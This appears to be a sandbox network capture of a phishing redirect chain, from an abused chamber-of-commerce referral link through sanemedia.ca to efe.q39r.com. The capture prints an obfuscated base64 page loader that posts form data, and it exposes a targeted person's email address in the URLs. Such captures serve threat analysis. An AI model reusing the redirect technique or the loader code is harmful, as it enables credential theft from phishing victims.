                                                                                  Apr 25, 2024 18:23:31.098404884 CEST1.1.1.1192.168.2.170x170aNo error (0)efe.q39r.com172.67.218.12A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:31.098404884 CEST1.1.1.1192.168.2.170x170aNo error (0)efe.q39r.com104.21.17.5A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:31.098753929 CEST1.1.1.1192.168.2.170xbc82No error (0)efe.q39r.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.103A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.105A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.106A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.104A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.147A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST1.1.1.1192.168.2.170xbc3fNo error (0)www.google.com64.233.177.99A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.813764095 CEST1.1.1.1192.168.2.170xd605No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818629026 CEST1.1.1.1192.168.2.170x8e26No error (0)www.google.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST1.1.1.1192.168.2.170x3a58No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST1.1.1.1192.168.2.170x3a58No error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.114A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST1.1.1.1192.168.2.170x3a58No error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.88A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST1.1.1.1192.168.2.170x3a58No error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.27A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST1.1.1.1192.168.2.170x3a58No error (0)d2vgu95hoyrpkh.cloudfront.net108.156.152.4A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:00.442609072 CEST1.1.1.1192.168.2.170x7554No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org34.196.110.25A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org23.23.165.157A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org3.221.38.252A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org54.91.228.73A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org3.211.223.136A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST1.1.1.1192.168.2.170xb667No error (0)httpbin.org174.129.50.9A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.370954037 CEST1.1.1.1192.168.2.170x9da1No error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.370954037 CEST1.1.1.1192.168.2.170x9da1No error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.370954037 CEST1.1.1.1192.168.2.170x9da1No error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org3.221.38.252A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org34.196.110.25A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org174.129.50.9A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org3.211.223.136A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org54.91.228.73A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST1.1.1.1192.168.2.170xe8dNo error (0)httpbin.org23.23.165.157A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.374860048 CEST1.1.1.1192.168.2.170x3b5eNo error (0)ipapi.co65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:28.044955969 CEST1.1.1.1192.168.2.170xfc0fNo error (0)ipapi.co172.67.69.226A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:28.044955969 CEST1.1.1.1192.168.2.170xfc0fNo error (0)ipapi.co104.26.9.44A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:28.044955969 CEST1.1.1.1192.168.2.170xfc0fNo error (0)ipapi.co104.26.8.44A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:28.046662092 CEST1.1.1.1192.168.2.170x83a6No error (0)ipapi.co65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.460645914 CEST1.1.1.1192.168.2.170x5b77No error (0)www.google.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.99A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.106A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.105A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.103A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.104A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST1.1.1.1192.168.2.170x8c10No error (0)www.google.com108.177.122.147A (IP address)IN (0x0001)false
                                                                                  • web.lehighvalleychamber.org
                                                                                  • sanemedia.ca
                                                                                  • https:
                                                                                    • efe.q39r.com
                                                                                    • code.jquery.com
                                                                                    • challenges.cloudflare.com
                                                                                    • www.google.com
                                                                                    • cdn.socket.io
                                                                                    • httpbin.org
                                                                                    • ipapi.co
                                                                                  • a.nel.cloudflare.com
                                                                                  • slscr.update.microsoft.com
                                                                                  • fs.microsoft.com
                                                                                  • login.live.com
                                                                                  • evoke-windowsservices-tas.msedge.net
                                                                                  • www.bing.com
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.1749700104.18.247.1414435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:52 UTC864OUTGET /cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1
                                                                                  Host: web.lehighvalleychamber.org
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: document
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:53 UTC550INHTTP/1.1 302 Found
                                                                                  Date: Thu, 25 Apr 2024 16:22:53 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: private
                                                                                  location: //sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==
                                                                                  x-aspnet-version: 4.0.30319
                                                                                  set-cookie: ASP.NET_SessionId=; path=/; secure; HttpOnly
                                                                                  x-powered-by: ASP.NET
                                                                                  x-frame-options: sameorigin
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faca5d8d344e1-ATL
                                                                                  2024-04-25 16:22:53 UTC203INData Raw: 63 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 2f 73 61 6e 65 6d 65 64 69 61 2e 63 61 2f 6f 77 61 6f 77 2f 79 6a 79 6f 38 71 2f 62 57 46 79 61 57 45 75 64 32 39 71 59 32 6c 6c 59 32 68 76 64 33 4e 72 61 55 42 6a 62 79 35 74 62 32 35 74 62 33 56 30 61 43 35 75 61 69 35 31 63 77 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                  Data Ascii: c5<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==">here</a>.</h2></body></html>
                                                                                  2024-04-25 16:22:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.1749703162.241.120.2424435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:53 UTC720OUTGET /owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== HTTP/1.1
                                                                                  Host: sanemedia.ca
                                                                                  Connection: keep-alive
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-User: ?1
                                                                                  Sec-Fetch-Dest: document
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:54 UTC231INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:52 GMT
                                                                                  Server: Apache
                                                                                  refresh: 0;url=https://efe.q39r.com/efe/#Xmaria.wojciechowski@co.monmouth.nj.us
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.1749704162.241.120.2424435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:54 UTC645OUTGET /favicon.ico HTTP/1.1
                                                                                  Host: sanemedia.ca
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw==
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:54 UTC164INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Apr 2024 16:22:53 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 315
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  2024-04-25 16:22:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.1749706172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:54 UTC677OUTGET /efe/ HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: document
                                                                                  Referer: https://sanemedia.ca/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:22:57 UTC1001INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:22:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vmdogOcwmT0WuvtljvMRa3PoKEq4Lnq2dIYlL0uUWWMnwwPcPt7ujfIXRSbfT1iYt%2B823JntjRHSTxNizxYSxBxXzNJFt8khBTVnVdHPkSkM3ywE19HC9UwOApy4vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkVuTjhpYXZwWDVORVBLMVRKWWJva0E9PSIsInZhbHVlIjoieEdkZ1drMVdXMzNIV2JOSW9iQnBaaVlYcDFXNDBxWjllbm9WWGkzMWlVdlBMaU0rcC9KYkZudkRtcnk4dlEycnVrL1Y2d0hiVW5ZYkRHNEpCemNSMUpYYkJzZ0k2U2JsS1YrSEVrLzlrbDVCMHBoSkpNcTk2cnpjUldSTzcvcVIiLCJtYWMiOiJiMWMzYjljZThiNDcwMmQ0M2E3ZmQ1YTUyYTRjMjJhODc2ZjI1NDU0YzkwYzUyNDIwNWU0ZDNiYTQ3NTA5NzllIiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:22:56 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:22:57 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 6c 68 4e 54 56 4a 57 45 35 53 54 6b 5a 4a 65 6e 45 35 62 54 6c 4a 4d 47 68 7a 56 31 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 33 6c 6c 4f 57 49 79 4e 55 52 36 5a 56 4d 30 54 45 5a 56 52 45 39 6a 4c 32 35 50 5a 6e 4e 4c 54 79 74 55 61 30 5a 78 51 6a 67 79 51 57 6b 31 63 55 4a 70 56 6d 5a 4f 63 56 67 31 59 6d 56 6f 4d 6a 64 57 52 32 31 5a 4b 33 4e 57 62 47 39 7a 61 6c 45 31 52 7a 4a 49 52 45 5a 49 55 55 45 78 61 58 46 32 4c 32 56 78 65 53 74 79 53 6e 55 32 63 57 78 71 4d 31 70 6f 51 57 51 77 61 7a 68 77 62 6a 42 4c 59 30 64 33 65 55 68 4f 55 6b 4a 49 61 46 4a 35 4e 6e 46 57 64 57 56 44 54 31 5a 34 52 6b 4a 42 64 57 4a 6c 4b 7a 59
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjlhNTVJWE5STkZJenE5bTlJMGhzV1E9PSIsInZhbHVlIjoia3llOWIyNUR6ZVM0TEZVRE9jL25PZnNLTytUa0ZxQjgyQWk1cUJpVmZOcVg1YmVoMjdWR21ZK3NWbG9zalE1RzJIREZIUUExaXF2L2VxeStySnU2cWxqM1poQWQwazhwbjBLY0d3eUhOUkJIaFJ5NnFWdWVDT1Z4RkJBdWJlKzY
                                                                                  2024-04-25 16:22:57 UTC1369INData Raw: 31 38 36 32 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54 4d 75 4e 69 34 77 4c 6d 31 70 62 69 35 71 63 79 49 2b 50 43 39 7a 59 33 4a 70 63 48 51 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 32 68 68 62 47
                                                                                  Data Ascii: 1862<script>document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbG
                                                                                  2024-04-25 16:22:57 UTC1369INData Raw: 44 51 6f 67 49 47 39 32 5a 58 4a 6d 62 47 39 33 4f 69 42 6f 61 57 52 6b 5a 57 34 37 44 51 70 39 44 51 6f 6a 61 55 31 4c 61 6d 64 6a 65 55 70 6b 52 43 42 6f 4e 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 41 37 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 75 4e 58 4a 6c 62 54 74 6d 62 32 35 30 4c 58 64 6c 61 57 64 6f 64 44 6f 31 4d 44 41 37 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 4d 53 34 79 4f 33 30 4e 43 69 4e 70 54 55 74 71 5a 32 4e 35 53 6d 52 45 49 47 67 30 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 70 6a 59 57 78 6a 4b 44 45 75 4d 79 6b 37 66 51 30 4b 51 47 31 6c 5a 47 6c 68 49 43 68 74 61 57 34 74 64 32 6c 6b 64 47 67 36 4d 54 49 77 4d 48 42 34 4b 58 73 4e 43 69 4e 70 54 55 74 71 5a 32 4e 35 53 6d 52 45 49 47 67 30 65 32 5a
                                                                                  Data Ascii: DQogIG92ZXJmbG93OiBoaWRkZW47DQp9DQojaU1LamdjeUpkRCBoNHttYXJnaW4tdG9wOjA7bWFyZ2luLWJvdHRvbTouNXJlbTtmb250LXdlaWdodDo1MDA7bGluZS1oZWlnaHQ6MS4yO30NCiNpTUtqZ2N5SmREIGg0e2ZvbnQtc2l6ZTpjYWxjKDEuMyk7fQ0KQG1lZGlhIChtaW4td2lkdGg6MTIwMHB4KXsNCiNpTUtqZ2N5SmREIGg0e2Z
                                                                                  2024-04-25 16:22:57 UTC1369INData Raw: 54 49 67 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 49 44 41 75 4e 58 4a 6c 62 53 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 32 6c 4e 53 32 70 6e 59 33 6c 4b 5a 45 51 67 4c 6d 67 30 49 48 74 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 47 4e 68 62 47 4d 6f 4c 6a 6b 77 4d 48 4a 6c 62 53 41 72 49 43 34 7a 64 6e 63 70 4f 33 30 4e 43 69 4e 70 54 55 74 71 5a 32 4e 35 53 6d 52 45 49 43 35 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 74 59 32 56 75 64 47 56 79 65 32 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 44 70 6a 5a 57 35 30 5a 58 49 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 70 54 55 74 71 5a 32 4e 35 53 6d 52 45 4c 6d 31 30 4c 54 56 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 7a 63 6d 56 74
                                                                                  Data Ascii: TIge21hcmdpbi10b3A6IDAuNXJlbSFpbXBvcnRhbnQ7fQ0KI2lNS2pnY3lKZEQgLmg0IHtmb250LXNpemU6IGNhbGMoLjkwMHJlbSArIC4zdncpO30NCiNpTUtqZ2N5SmREIC5qdXN0aWZ5LWNvbnRlbnQtY2VudGVye2p1c3RpZnktY29udGVudDpjZW50ZXIhaW1wb3J0YW50O30NCiNpTUtqZ2N5SmRELm10LTV7bWFyZ2luLXRvcDozcmVt
                                                                                  2024-04-25 16:22:57 UTC1369INData Raw: 56 6c 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 33 4e 68 62 6d 56 74 5a 57 52 70 59 53 35 6a 59 53 38 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 54 57 39 36 61 57 78 73 59 53 38 31 4c 6a 41 67 4b 46 64 70 62 6d 52 76 64 33 4d 67 54 6c 51 67 4d 54 41 75 4d 44 73 67 56 32 6c 75 4e 6a 51 37 49 48 67 32 4e 43 6b 67 51 58 42 77 62 47 56 58 5a 57 4a 4c 61 58 51 76 4e 54 4d 33 4c 6a 4d 32 49 43 68 4c 53 46 52 4e 54 43 77 67 62 47 6c 72 5a 53 42 48 5a 57 4e 72 62 79 6b 67 51 32 68 79 62 32 31 6c 4c 7a 45 78 4e 79 34 77 4c 6a 41 75 4d 43 42 54 59 57 5a 68 63 6d 6b 76 4e 54 4d 33 4c
                                                                                  Data Ascii: VlPSJodHRwczovL3NhbmVtZWRpYS5jYS8iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3L
                                                                                  2024-04-25 16:22:57 UTC774INData Raw: 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 63 46 64 71 63 56 52 56 64 56 68 33 56 53 6b 4e 43 69 41 67 49 43 41 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32
                                                                                  Data Ascii: 0aG9kOiAiUE9TVCIsDQogICAgICAgICAgICBib2R5OiBuZXcgRm9ybURhdGEocFdqcVRVdVh3VSkNCiAgICAgICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgICAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2
                                                                                  2024-04-25 16:22:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.1749709151.101.130.1374435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:22:57 UTC618OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                  Host: code.jquery.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
